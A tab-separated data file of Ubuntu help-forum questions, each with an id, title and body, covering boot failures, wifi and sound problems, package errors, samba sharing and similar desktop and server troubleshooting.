460805	ubuntu 14.04 hangs while screen is off	i have an asus g73jw laptop with a fresh install of ubuntu 14.04 x64 . while i 'm using the laptop , it works quite well - but if i leave the laptop unattended for a while , i come back it will have a black screen and wo n't come back . i 've also noticed the laptop is really hot . it seems like the fans go down to minimum , and maybe that causes the laptop to overheat and freeze ? i have another laptop that seems to have the same symptoms - a dell inspiron 1445 - however i do n't find it hot . i ca n't tell whether it 's that the computer hangs while the fans just by chance are running too low , and it gets hot because of it , or if it hangs because it gets hot . any ideas or suggestions on how to troubleshoot ? i did not have these issues on 13.10 !
460808	firefox is lagging after update to the 29 version	today 's update of firefox to the 29 version makes browsing very slow . for example firefox incredibly lagging when i am zooming or moving on google maps . does anyone the same problem ? how can i speed it up ? my os : ubuntu 12.04 , x64
460811	serious errors were found while checking the disk drive for /	upgraded from 13.10 to 14.04 . all seemed to go ok , but following reboot i get this message : serious errors were found while checking the disk drive for / . if i ignore that one , i get a further message : the disk drive for /tmp is not ready yet or not present and fails to boot . what can i do ? is it possible to do a manual recovery ?
460812	ubuntu 14.04 install does n't boot but but displays read error	i am aware that similar questions have been posed already , but after several tries , i still have n't found a solution . any help is much appreciated . i have installed ubuntu 14.04 on my new thinkpad x1 carbon using the default `` erase and install '' option ( the laptop came with windows 7 and has both legacy bios and uefi - the legacy bios is enabled ) . at first , i was able to boot into ubuntu , however , the boot time was very long and sometimes the grub menu appeared and i had to set root and prefix myself to boot into ubuntu . running boot-repair indicated that the problem was that the boot files were located far from the beginning of the disk and that the bios therefore had problems finding them . to remedy this , i created a boot partition at the beginning at the disk using gparted and boot-repair . however , this did n't solve the problem - not sure why . so i decided to start all over - i.e . merge the boot partition back into the partition with the ubuntu installation and do a fresh install ( `` erase and install '' ) . apparently , this made things worse . when i turn on the laptop , it simply displays `` read error '' ( after the bios messages ) . my suspicion is that the master boot record ( mbr ) got deleted during the partitioning . ( i seem to remember that the first partition started at 1mb before i partitioned the drive , but now starts at zero ) . i have tried to restore the mbr with boot-repair ( which is done successfully according to boot-repair ) , but when i then try to do the `` recommended boot repair '' afterwards it gives an error ( also saying `` please do not forget to to make your bios boot on sda disk ! '' ) . the boot-repair url log is here http : //paste.ubuntu.com/7395389 any help is much appreciated - thanks . update : i have tried deleting all partitions on the drive using gparted and then installing ubuntu with default setting `` erase and install '' . installation went well , but when the laptop is turned on it enters the `` grub rescue '' . `` ls '' gives `` ( hd0 ) ( hd0 , msdos1 ) '' , `` ls ( hd0 , msdos1 ) '' gives `` ( hd0 , msdos1 ) : filesystem unknown '' and `` error : failure reading sector 0x802 from 'hd0 ' '' . issuing the command `` ls '' and `` ls ( hd0 , msdos1 ) '' makes the laptop think for a while . after typing `` ls ( hd0 , msdos1 ) '' a second time , i got `` error : no such partition '' .
460818	info : task ______ blocked for more than 120 seconds . `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message	i 'm running ubuntu server 12.04 at home and when i ran sudo reboot , this is the message i got : * stopping mta * asking all remaining processes to terminate ... * all processes ended within 1 seconds ... . * deconfiguring network interfaces ... [ 1054679.389454 ] info : task wpa_supplicant:758 blocked for more than 120 seconds . [ 1054679.389479 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . [ 1054679.389584 ] info : task kworker/0:2:13144 blocked for more than 120 seconds . [ 1054679.389601 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . [ 1054799.389340 ] info : task wpa_supplicant:758 blocked for more than 120 seconds . [ 1054799.389364 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . [ 1054799.389471 ] info : task kworker/0:2:13144 blocked for more than 120 seconds . [ 1054799.389488 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . so on and so forth , alternating between the wpa_supplicant and kworker messages , and it just hung while refusing to reboot . any help diagnosing this issue would be greatly appreciated !
460819	ubuntu , gtk 3.10.8 , not able to visualize a menubar made by glade	my problem is that i 've drawn a ui with glade , but the menubar does n't want to be drawn . here is the xml , just a sample : please try to check out the properties . it is a very simple menubar but i ca n't find the problem . i 've tried to set up something in the properties , but all failed . can anyone help me ? < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < ! -- generated with glade 3.16.1 -- > < interface > < requires lib= '' gtk+ '' version= '' 3.10 '' / > < object class= '' gtkimage '' id= '' image3 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' stock '' > gtk-help < /property > < property name= '' icon_size '' > 1 < /property > < /object > < object class= '' gtkwindow '' id= '' window1 '' > < property name= '' can_focus '' > false < /property > < child > < object class= '' gtkbox '' id= '' box1 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' orientation '' > vertical < /property > < child > < object class= '' gtkmenubar '' id= '' menubar1 '' > < property name= '' visible '' > true < /property > < property name= '' app_paintable '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' halign '' > start < /property > < property name= '' valign '' > start < /property > < property name= '' margin_left '' > 1 < /property > < property name= '' margin_right '' > 1 < /property > < property name= '' margin_top '' > 1 < /property > < property name= '' margin_bottom '' > 1 < /property > < child > < object class= '' gtkmenuitem '' id= '' menuitem1 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' label '' translatable= '' yes '' > _file < /property > < property name= '' use_underline '' > true < /property > < child type= '' submenu '' > < object class= '' gtkmenu '' id= '' menu1 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < child > < object class= '' gtkmenuitem '' id= '' imagemenuitem1 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' label '' translatable= '' yes '' > converti < /property > < /object > < /child > < child > < object class= '' gtkmenuitem '' id= '' imagemenuitem2 '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' label '' translatable= '' yes '' > avanti < /property > < /object > < /child > < child > < object class= '' gtkimagemenuitem '' id= '' imagemenuitem3 '' > < property name= '' label '' translatable= '' yes '' > aiuto < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > false < /property > < property name= '' image '' > image3 < /property > < property name= '' use_stock '' > false < /property > < property name= '' always_show_image '' > true < /property > < /object > < /child > < /object > < /child > < /object > < /child > < /object > < packing > < property name= '' expand '' > false < /property > < property name= '' fill '' > true < /property > < property name= '' position '' > 0 < /property > < /packing > < /child > < child > < object class= '' gtkbutton '' id= '' button1 '' > < property name= '' label '' translatable= '' yes '' > button < /property > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > true < /property > < property name= '' receives_default '' > true < /property > < /object > < packing > < property name= '' expand '' > false < /property > < property name= '' fill '' > true < /property > < property name= '' position '' > 1 < /property > < /packing > < /child > < /object > < /child > < /object > < /interface >
460820	completely remove sendmail	how do i completely remove sendmail ? i have tried the following : apt-get remove sendmail apt-get purge sendmail sendmail is still there and running , how do i completely remove it and all config files ?
460823	create a bootable usb in a mac for a non-mac system	i 'm trying to make a bootable usb stick on mac os x and get the acer aspire accept it . windows 7 is gone completely on the acer and ubuntu 13.04 or 13.10 does not start at all . i tried to make a mac-bootable usb stick , but i can not .
460825	how to open youtube video with youtube-dl	ok so i found this answer to someones question about how to download youtube videos via youtube-dl . it had all of the information that i needed , except how to open the video . here is what i have so far : sudo apt-get update sudo apt-get install youtube-dl youtube-dl youtube-video-link it downloads ok , i just do n't know how to open it . again , thanks for your help .
460830	can i dual boot windows ?	i have ubuntu already installed on my computer that i just bought , and i have a copy of windows 7 . i like the feel of ubuntu , and plan on trying it out , but i have many windows-specific applications . so , my question is , is it possible for me to dual boot windows from ubuntu . i understand people usually dual boot ubuntu from windows , but i have it the other way around . what do you suggest , or is this possible ?
460832	ca n't get sound out of speakers and computer	i have ubuntu 14.04 lts , it was udated from 12.04 lts on saturday . i use two monitors , my computer monitor and my tv using hdmi 3 . i used to be able to have my computer on without the tv monitor on and have sound come out of the computer and then , when i turned the tv on i 'd get sound from the computer and the tv with its speakers . since the update has been done i can only get sound from one or the other . i went to system settings and then sound and i have to manually change the output from hdmi when the tv monitor is on to analogue when the computer monitor is only on . i ca n't figure out why i can no longer get sound from both sources at the same time . any ideas , thanks for reading , naomi .
460837	mcrypt extension is missing in 14.04 server for mysql	the php mcrypt extension on ubuntu 14.04 shows that it is installed properly , but phpmyadmin says : the mcrypt extension is missing . please check your php configuration . my current php config is here . if you need anymore information , please contact me through the comments . $ sudo apt-get install php5-mcrypt reading package lists ... done building dependency tree reading state information ... done php5-mcrypt is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
460840	manually installing themes and changing settings	i have always wondered if installing themes and changing setting seen on ccsm ( compizconfig settings manager ) possible manually . if so how can i manually install and change a theme using a command line ? thanks
460841	problem converting wma to mp3 audio	when i tried to convert my audio files from wma to mp3 , i get an error message that i need to search for a plugin . see pictures below . how can i convert these audio files ?
460850	what if i never update to minor updates	in vista , i have turned updates totally off ; i update when i feel like it ; and i will be to blame if i do n't update when there has already been a cyber world war ( which is sarcastic for `` i update when i feel like it '' ) . what if i do that in linux ? by linux i definitely mean ubuntu . for downvoters : i do n't want to update my ubuntu everyday , i only want to update to major long term supports , what is my liability ?
460851	how to install xfce4-xfapplet-plugin on 14.04 ?	i would like to add gnome2 applets to an xfce panel . according to this , i should install xfce4-xfapplet-plugin . i ca n't do sudo apt-get install xfce4-xfapplet-plugin because xfce4-xfapplet-plugin is only available for lucid . does anyone know how i can get use gnome2 applets in xfce ? thanks .
460853	can not move link with drag and drop to desktop	i cant move links into folders or any where with drag and drop on the desktop . they disappear and i get error can not find file ... .
460855	sound keeps repeating ( stuttering )	yesterday while i was watching a youtube video the sound started glitching . there are two kinds of glitches : the most common kind is where the sound repeats an approximately 1/4 second bit of sound for around two seconds , then plays normally ( beginning from where it would have been had it not been repeating ) for another two seconds . then it repeats ad nauseum . occasionally , it the sound will repeatedly pause for a fraction of a second . this is n't so annoying as i do n't miss any content . this second option seems to only occur when playback is started while cpu usage is low . however , low cpu does n't guarantee this option . i originally blamed adobe flash . however , killing it did n't fix anything . then i noticed that pulseaudio was consuming a lot of audio during the glitches . so , i killed it . no dice . i rebooted . no dice . i decided to test another program , so i tried rhythmbox . the same problem occurred , but with less frequency . what 's going on here ? partial output from lshw : *-multimedia description : audio device product : 82801h ( ich8 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:48 memory : fe020000-fe023fff
460856	how to install gnu parallel in ubuntu 12.04 with my firewall ?	i am running ubuntu 12.04 in our production system . how do i install gnu parallel in my system ? my system is behind a firewall so it will block any download from external connection .
460857	the make comand will always say there is a error	i am currently trying to install dashing , but i have this problem that no matter what language make it using it returns error 1 and i ca n't get rid of it . i have successfully installed it on a laptop i own also running ubuntu and it worked using the same method on the dashing github page . error in paste bin http : //pastebin.com/1bgfau6f
460859	toshiba satellite p775 usb random failure	i have a toshiba satellite p775 with 3 usb2 ports and 1 usb 3.0. before installing ubuntu it had overheating issues ( donât know if this is relevant ) i am running ububtu 14.04 lts . anyway my problem is that randomly the usb 2.0 ports will stop functioning they still output current but my mouse and storage-devices are not connect or read . my question is mostly if anyone else is having this problem and if there is a way to fix it .
460863	can not find `` enable wireless '' option in ubuntu 12.04 network drop down	historically , there is an `` enable wireless '' option that i can have ticked or unticked that is just beneath the `` enable networking '' option when i right click on the network bar . suddenly this disappeared one day , and i ca n't connect to wireless , nor does the option even exist to enable wireless . the output for rfkill list all is below : rfkill list all 1 : tpacpi_bluetooth_sw : bluetooth soft blocked : yes hard blocked : no and that is all . there is no wireless that is being displayed . the output for sudo lshw -c network is : *-network description : ethernet interface product : ethernet connection i218-lm vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : 28 : d2:44:4d : b6:89 size : 1gbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.0.0-k duplex=full firmware=0.6-3 ip=10.0.28.48 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:57 memory : f0600000-f061ffff memory : f063e000-f063efff ioport:3080 ( size=32 ) *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 83 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0400000-f0401fff does anyone know how i can enable wireless ? i have also tried : sudo /etc/init.d/networking restart and have checked to make sure drivers are up to date as well .
460865	i can get through the login but after it just has an orange screen that says ubuntu 14.04 and the sidebar and desktop will not show up	i am a ubuntu newbie and i got ubuntu and it worked for 2 weeks but i installed a few thing and then shut down the next morning when i booted into ubuntu it let me log in but then it just stayed on an orange screen that said ubuntu 14.04 and the side bar and rest of the desktop never showed i waited an hour for and still nothing
460871	how to setup openvpn client	i 'm trying to setup openvpn using networkmanager . the gui seems buggy and unresponsive . are there any other tools for setting up a vpn client ?
460873	installing ubuntu on a separate drive	i am wanting to use ubuntu for daily use and my programming contract work ( basically everything except for gaming ) . right now i have windows installed on a 64gb ssd and all of my applications/docs/videos/games/etc are installed on a separate hdd . in a month or so i am going to be getting a couple of new drives so i can get stop using two different drives for one os ( it just really bugs me having them separate for some reason ) . i have already read this article and this one . however , i am asking a more fundamental question , should i do this ? will i have a better experience doing it a different way ? so i was just considering re installing windows onto my hdd and then using the 64gb ssd for ubuntu . would that be an unwise decision on my part ? most ubuntu installation tutorials i see either discuss installing as a partition or on a usb . so i am a little hesitant . what do you all think ? if it sounds okay , are there any tutorials out there for doing what i am talking about ?
460875	wifi connection slow and weak on ubuntu 14.04	i am pretty new to ubuntu so please bear with me , so basically i installed ubuntu14.04 on my samsung 900x laptop , and the wifi signal becomes very weak and i could n't connect to the internet at all , but the wifi on my mac is fine . i 'm wondering if anyone would have any idea how to solve this ? i tried all the methods on the following links and they did n't seem to work . http : //zeroset.mnim.org/2014/04/22/unstable-wifi-connection-on-ubuntu-14-04-trusty-tahr-ctrl-event-disconnected-reason4-locally_generated1/ http : //itsfoss.com/speed-up-slow-wifi-connection-ubuntu/ to update : i do get a connection at times , but it 's super unstable and lasts for only a few seconds.. however , my samsung laptop appears to have a strong and stable connection to my phone 's hotspot network ... but my mac has a very strong and stable connection to the home wifi ... any idea ?
460877	kernel 3.13 is not installing in ubuntu 14.04	my acer c7 chromebook has ubuntu 14.04 installed and i recently tried to install 3.13 because it came with the built it kernal of 3.4.0 when i installed the neccessary packages and rebooted the ubuntu i still have the kernel 3.4.0 any help thanks again .
460878	guake icon misaligned at top of screen	anyone know how to fix guake 's misaligned icon at top of screen on a clean install of xubuntu 14.04 ?
460879	traditional chinese hand writing input method	i have installed ibus-tegaki and done input setting to ibus . i can type with pinyin input but problem is that i can not write some characters that i can not pronounce . please tell me how i can copy chinese characters with a mouse when i am offline . i mean where to press on my laptop to get entry to that input . thanks .
460880	bootstrap mdadm raid6 server via usb flash	on my ubuntu server 14.04 i have large mdadm raid6 array , and tiny boot hdd . i want to get rid of that boot hdd , and boot system from usb flash drive . although i know it is possible to install ubuntu on a usb flash drive - i do n't want to do it in order to limit writes to usb drive ( that 's literally asking for reliability troubles on a server ) . is there any guidelines or tutorials or suggestions on how to only move my initial steps ( grub , initrd image e.t.c ) of ubuntu boot to usb stick , and then have / mounted on this raid array ? just to clarify - i do n't want to move my whole system partition to usb drive , i only want to move the bare minimum there to limit writes on usb stick .
460885	how to clone git repository only some directories ?	for example , i want to download pcl 3d_rec_framework . this is the git repository of pcl : https : //github.com/pointcloudlibrary/pcl.git how to download this directory ? https : //github.com/pointcloudlibrary/pcl/tree/master/apps i have tried to run but not works : sam @ sam : ~/code/pcl_standalone $ git clone https : //github.com/pointcloudlibrary/pcl/tree/master/apps/3d_rec_framework cloning into '3d_rec_framework ' ... error : the requested url returned error : 403 while accessing https : //github.com/pointcloudlibrary/pcl/tree/master/apps/3d_rec_framework/info/refs fatal : http request failed sam @ sam : ~/code/pcl_standalone $ how to download it ? by the way , i do n't want to download git of pcl and remove all other directories that i do n't want . that 's why i ask this question . thank you~
460895	preseed script : no root file system found	i have the following preseed script . i am getting `` no root file system found '' . d-i partman-auto/init_automatically_partition select some_device # force gpt label type for all disks now d-i partman-basicfilesystems/choose_label string gpt d-i partman-basicfilesystems/default_label string gpt d-i partman-partitioning/choose_label string gpt d-i partman-partitioning/default_label string gpt d-i partman/choose_label string gpt d-i partman/default_label string gpt partman-partitioning partman-partitioning/choose_label select gpt # # if this is a reinstall , remove the previous data , do n't ask . # d-i partman-lvm/device_remove_lvm boolean true d-i partman-lvm/confirm boolean true d-i partman-md/device_remove_md boolean true # d-i partman/early_command \ string debconf-set partman-auto/disk `` $ ( list-devices disk | head -n1 ) '' # d-i partman-auto/disk string /dev/sda d-i partman-auto/method string regular # # this creates 20gb / , no swap , and the remainder of the disk in /ebay . # d-i partman-auto/expert_recipe string \ cassini : : \ 1 1 1 free \ $ iflabel { { gpt } } \ method { { biosgrub } } \ . \ 20480 5 20480 ext4 \ $ primary { { } } $ bootable { { } } \ method { { format } } format { { } } \ use_filesystem { { } } filesystem { { ext4 } } \ mountpoint { { / } } \ . \ 500 10 1000000000 ext4 \ method { { format } } format { { } } \ use_filesystem { { } } filesystem { { ext4 } } \ mountpoint { { /ebay } } \ . d-i partman-auto/choose_recipe select cassini # d-i partman-auto/choose_recipe select atomic # partman-basicfilesystems partman-basicfilesystems/no_swap boolean false # d-i partman/default_filesystem string ext4 d-i partman/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true i am not sure which line is causing the problem . i have n't wrote this script - i just got it from somewhere . how can i fix this problem ? thanks in advance .
460898	how to enable touch pad gestures in dell inspiron 5110 in ubuntu 12.04 lts ?	i tried a lot and check many given solutions in askubuntu.com too . but nothing is working . please help..
460899	how to recognize backlit of an asus ux31e keyboard ?	i replaced the keyboard in my asus ux31e with one from later ux31a . the only technical difference between the two is that the latter has keyboard backlight and uses fn + f3 / f4 for this . however , i ca n't get keyboard backlight to work , the module is not loaded and the function keys are not registered in xev , showkey or acpi_listen . how can i find the device name for the keyboard ? is there any way to force ubuntu to recognize my keyboard as ux31a ? i 'm looking for further ways to troubleshoot this issue . additional information according to the community help wiki for ux31a , keyboard backlight should work after 13.04 . this is where the module is for ux31a users : /sys/class/leds/asus : :kbd_backlight/brightness lsmod | grep -i asus : module size used by asus_nb_wmi 16990 0 asus_wmi 24191 1 asus_nb_wmi sparse_keymap 13948 1 asus_wmi wmi 19177 1 asus_wmi video 19476 2 i915 , asus_wmi dmesg | grep -i asus : [ 0.000000 ] dmi : asustek computer inc. ux31e/ux31e , bios ux31e.214 08/14/2012 [ 0.000000 ] acpi : rsdp 00000000000f0430 000024 ( v02 _asus_ ) [ 0.000000 ] acpi : xsdt 00000000baffee18 000074 ( v01 _asus_ notebook 06222004 msft 00010013 ) [ 0.000000 ] acpi : facp 00000000baf9ad98 0000f4 ( v04 _asus_ notebook 06222004 msft 00010013 ) [ 0.000000 ] acpi : dsdt 00000000baf87018 012544 ( v01 _asus_ notebook 00000000 intl 20091112 ) [ 0.000000 ] acpi : apic 00000000baffdf18 0000cc ( v02 _asus_ notebook 06222004 msft 00010013 ) [ 0.000000 ] acpi : dbgp 00000000baffff18 000034 ( v01 _asus_ notebook 06222004 msft 00010013 ) [ 0.000000 ] acpi : ecdt 00000000bafe4b18 0000c1 ( v01 _asus_ notebook 06222004 ami . 00000003 ) [ 0.000000 ] acpi : slic 00000000baf9be18 000176 ( v01 _asus_ notebook 06222004 asus 00000001 ) [ 0.000000 ] acpi : hpet 00000000bafe5d18 000038 ( v01 _asus_ notebook 06222004 ami . 00000003 ) [ 0.000000 ] acpi : mcfg 00000000bafe5c98 00003c ( v01 _asus_ notebook 06222004 msft 00000097 ) [ 11.529045 ] asus_wmi : asus wmi generic driver loaded [ 11.530590 ] asus_wmi : initialization : 0x1 [ 11.530629 ] asus_wmi : bios wmi version : 7.6 [ 11.530683 ] asus_wmi : sfun value : 0xa0877 [ 11.531584 ] input : asus wmi hotkeys as /devices/platform/asus-nb-wmi/input/input17 [ 11.633914 ] asus_wmi : disabling acpi video driver here 's the entire entire lshw on pastebin .
460900	how to allow everyone on smb ( samba ) to edit	so i set up a server on my home network using samba , i use a linux computer running ubuntu 12.04 lts . however i want to connect to the server on a mac . i can find the file fine however when i drop a file in it says `` the operation canât be completed because you donât have permission to access some of the items . '' if anyone knows what to do or can refer me to a video please do so thanks
460901	moving root lvm within same drive	i recently upgraded my linux to the latest version , and also shrunk its size to give me more room to expand my win7 install on the same disk . the problem is that the free room is at the end of the disk , not between the two installs where it would be easy to expand the win7 partition into the free space . so , i want to move the new lvm to the end of the drive along with its boot safely and follow that up by expanding my win7 into the free space between . i tried to do this with gparted from the livecd . it let me expand the lvm , but not shrink it from the left to create the empty space in the middle . how should i do this ? thanks
460904	mouse disapear after laptop come back from sleep mode	i use 14.04 xubuntu and my mouse cursor become transparent after the laptop come back from sleep mode or hibernated mode . i want something more permanent then ctrl+alt+f1 -- > ctrl+alt+f7
460908	error while booting ubuntu 14.04	recently i upgraded to ubuntu14.04 , whenever boot loader starts , getting an error message error : file not found for 3 seconds and os starts loading , while loading os also getting same error message : error : file not found error : file not found error : file not found press any key to continue until unless i press the key the os is not loading . please provide me a solution to avoid those error messages .
460910	pc not booting from lubuntu cd image	nooby question , i just downloaded lubuntu 14.04 ( 32 ) cd image and burned to a cd disk using win7 the file is there when viewed in explorer but if i restart the pc with the cd installed the pc wants to start win 7 , no option to start lubuntu . the bios has the cd drive set as # 2 boot option after floppy drive # 1 . there is no option to boot from usb . i note the desktop configuration file has not been copied to the cd nor can i find this file in ie temp folders . is this the reason my pc will not boot . where can i find a copy of the desktop configuration file
460911	trouble with touchpad & mouse scroll	i have notebook hp compaq 6720s with ubuntu 14.04 . mouse scroll work ok , but scroll on touchpad is reversed . i trying to configurate touchpad in ubuntu tweak , result : touchpad scroll works ok , but mouse scroll is reversed . how i can make both scrolls work normally ? tpconnfig is installed , my touchpad is synaptics . sudo tpconfig found synaptics touchpad . firmware : 8.96 ( multiple-byte mode ) .
460912	ubuntu 14.04 failed to detect usb modem [ mts mblaze ] after system update	my fresh ubuntu 14.04 box was able to detect an usb modem and successfully connected to internet , though i found connection is sometime shaky . but the joy lasted only few days . now , if i remember correctly , after having a regular system update the system is no more able to detect the usb modem . however the device is listed in the lsusb result . in the network management menu , i ca n't see the enable mobile broadband option any more . on the other hand , my laptop that also running ubuntu 14.04 can still successfully connect the device to internet . any diagnostic steps , suggestions are highly appreciated..thanks
460919	smtp password failed	i can not send mail form client system . when send the mail it was asking smtp password of the server and i was give the password of the client . by following steps go to 1.applications 2.accessories 3.password and encryption keys i have copy the password and pasted in the mail .but it is again asking the smtp server password to authentication the mail can any one say the problem
460924	how to access web server from inside/outside network	i 've installed ubuntu on my web server . i 'm able to access the web server from my home using the ip address . i 'm also able to access it outside my home network using a domain that i purchased . the problem is that i can not access my server outside my network without changing my hosts file . this becomes a hassle because i need to do this every time and because i 've setup owncloud on my server i need to have a connection to my server at all times . is there a way to access my server both outside and inside my network without changing my hosts file every time ?
460926	is there a gui for configuring the radeon open source drivers and mesa 3d similar to catalyst control center ?	is it possible to change the settings of the radeon open source drivers and mesa 3d graphics library ? i am thinking of something similar to catalyst control center that would allow me to control settings such as : toggling vsync toggling framebuffering changing 3d acceleration changing aspect ratio / stretching to fit the screen changing power settings fwiw , my graphics card is a radeon hd 4350 ( rv710 ) and i am running ubuntu 14.04 .
460927	can not update the system : e : malformed line 1 in source list /etc/apt/sources.list ( dist parse )	this is my problem i was changing ubuntu 12.04 to 12.10 . all the downloads and installations were ok. then after the restart , my touchpad and my wireless card were unable to use . i could solve the problem which was with the touchpad . i was thinking that the problem with the wireless will able to solve with upgrade , and update commands . so i opened the terminal and entered the commands . but i can not update the system . i tried several times but not succeeded . this is what the details said about my problem : e : malformed line 1 in source list /etc/apt/sources.list ( dist parse )
460928	execute a command when add a new file in folder	i am not sure weather it 's possible or not . i am looking for a script/command that will execute a command or run a scripts when i will add a file in a folder . for instance : i am practicing bash scripting . after writing a bash script , i have to make my script file to a executable using this command chmod +x filename.sh . all my scripts has stored in a folder named bash . so , when i add a new .sh file in that folder , i want a command/script to run which will make my .sh file executable . how to do it ?
460930	led values in /etc/kbd/config	i have installed lubuntu 14.04 and is fighting with getting numlock on at logon dialog , and none of the methods i found in here work - so i 'm investigating every single file to see what is going on . in the file /etc/kbd/config this text is found : # turn on numlock by default # leds=+num what could be inserted instead of `` +num '' - where can i find the documentation ?
460932	how can i fetch lyrics for all my music and store them within the files ?	i have a large music library ( most of them are .mp3 & .m4a ) and none of them have lyrics . is there any program or plug-in that automatically adds lyrics to all of my music by querying the internet ? because i do n't usually have an internet connection i need a program which automatically adds all lyrics to music file tags so i can view them offline .
460933	unable to install grub , running 'grub-install -- force failed	i am trying to install ubuntu 14.04 on a lenovo yoga 2 pro alongside windows 8.1 on a separate partition . i assigned 10gb for swap space and 90gb for ubuntu itself . whenever i try to install ubuntu i get an error saying : unable to install grub in /dev/sda executing grub-install /dev/sda failed . this is a fatal error . also in details i get the following message : ubuntu kernel : [ 1946.372741 ] fat-fs ( sda2 ) : error , fat_get_cluster : invalid cluster chain ( i_pos 0 ) . ubuntu grub-installer : error : running 'grub-install -- force failed . can anyone suggest a solution ?
460937	in /etc/pam.d/sshd , what does `` # [ 1 ] '' mean ?	in the pam configuration file /etc/pam.d/sshd , there are a few lines ending in # [ 1 ] ; for example : session optional pam_motd.so # [ 1 ] this does n't seem to appear in any of the other pam config files . what looks like a corresponding line in /etc/pam.d/login is simply : session optional pam_motd.so what does the # [ 1 ] mean in the sshd file ? i could n't find an explanation in the pam or pam.d manpages . i suspect it is n't a comment because vim is n't highlighting it the same as the other comments in that file . besides , it is n't very meaningful as a comment .
460938	should i backup some files if i upgrade 12.04 to 14.04 ?	currently i 'm using ubuntu 12.04 . i would like to upgrade to 14.04 . should i backup some important such as those of the web root folder ? if i would need so , how should i proceed ?
460941	pendrive not showing up	my sandisk 8gb pendrive was working perfectly in my ubuntu until recently i make that as windows xp botable pendive and installed xp on my another machine and then after formatting it inserting it in any linux machines not showing up any plugged devices ..but still working in all windows machine result of lsblk in terminal is as follows name maj : min rm size ro type mountpoint sda 8:0 0 149.1g 0 disk ├─sda1 8:1 0 145.8g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 3.2g 0 part [ swap ] sdb 8:16 0 7.5g 0 disk sr0 11:0 1 1024m 0 rom the sdb in the above seems to be my pen drive .. but however its not showing up anywhere ... kindly help me sorting out this issue please
460945	ubuntu 14.04 : slow booting and never shut downs in laptop	i 've downloaded latest ubuntu desktop ( version 64-bit ) and created a bootable ubuntu from usb using pendrive linux . the specs for my laptop and usb flash drive are as follow : laptop model : acer aspire 4750 , intel i5 , nvidia geforce gt520m ( update to latest ) , 64-bit usb flash : 2.0 ubuntu : version 14.04 , grub ( not grub2 ) , i guess i 'm using unity de ( default since i did n't download or install any other de version . one thing i noticed during mounting ubuntu on the flash drive is if i lower the persistence volume , the booting time become shorter , but still unable to shut down . i 'm currently using ubuntu in live session mode ( try mode ) . during booting , a black screen appears for few minutes ( with no errors message ) before the ubuntu splash screen appears ( loading screen ) and i 'm able to use ubuntu . if i shut down ubuntu , it can not shut down and i have to do it by pressing my on/off power button . during the shut down , the ubuntu splash screen appears and that 's all with no error message . shutting down using command line does not solve it although it shut down and still , just showing the splash screen . another problem is regarding usage in ubuntu terminal . when i typed in sudo vi/etc/default/grub , the error message appeared after it was sudo : sudo vi/etc/default/grub command not found . there are directories for grub as i searched on the computer . but why did the error occur ? on the other hand , it has no problem on desktop pc ( 32-bit ) . it boots fast and shut down properly , but the above command line issue still occurs . i 'm completely new to ubuntu . any help is appreciated !
460949	14.04 display issues / error upon first login / wont suspend / etc	i 've got a new laptop , an asus zenbook ux301 , comes with a nvidia geforce 730m video card . it came installed with windows 8 which i loathe so much , and really want to get ubuntu to work . there a few main issues that i 'm having with the latest installation of 14.04 that are preventing me from removing windows completely . i 'm actually typing this from the windows because ubuntu is so un-usable right now its annoying . first off , i 'm not able to use anything but the default x.org drivers for the video card , everytime i try and use the nvidia drivers , unity fails to load after the login screen . it has some error about not being able to use/find display:0 so i 'm stuck using the default x.org drivers . after i do log in , it gives me an error with no details in the top left corner mentioning that something went wrong . how can i see the details of this error in any log so i can try and fix it ? thirdly , when i close the lid of my laptop , ubuntu wont properly goto sleep , i can still hear the hard drive running and in a few hours the laptop will be dead because it never actually turned off . even though in the settings its set to goto sleep . the fourth issue is that when i open the lid after closing it , i get a blank screen with a flashing text cursor on it . i have to goto terminal 1 and then back to 7 to load up unity again . after i do that and log in , it constantly keeps logging me out ! finally , i ca n't get the hdmi output on my laptop to work with my sound system . i 've used pusleaudio and alsa mixer and they both recognize that i have a hdmi port , but wont change its status from unplugged to plugged . if anyone can help me get rid of these issues so i can get rid of windows 8 i would greatly appreciate it .
460951	e : encounterd a section with no package : header	whenever i am trying to open software center it crashes . i ran the command : sudo apt-get install -- reinstall software-center the following problem appeared : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise_multiverse_binary-amd64_packages e : the package lists or status file could not be parsed or opened .
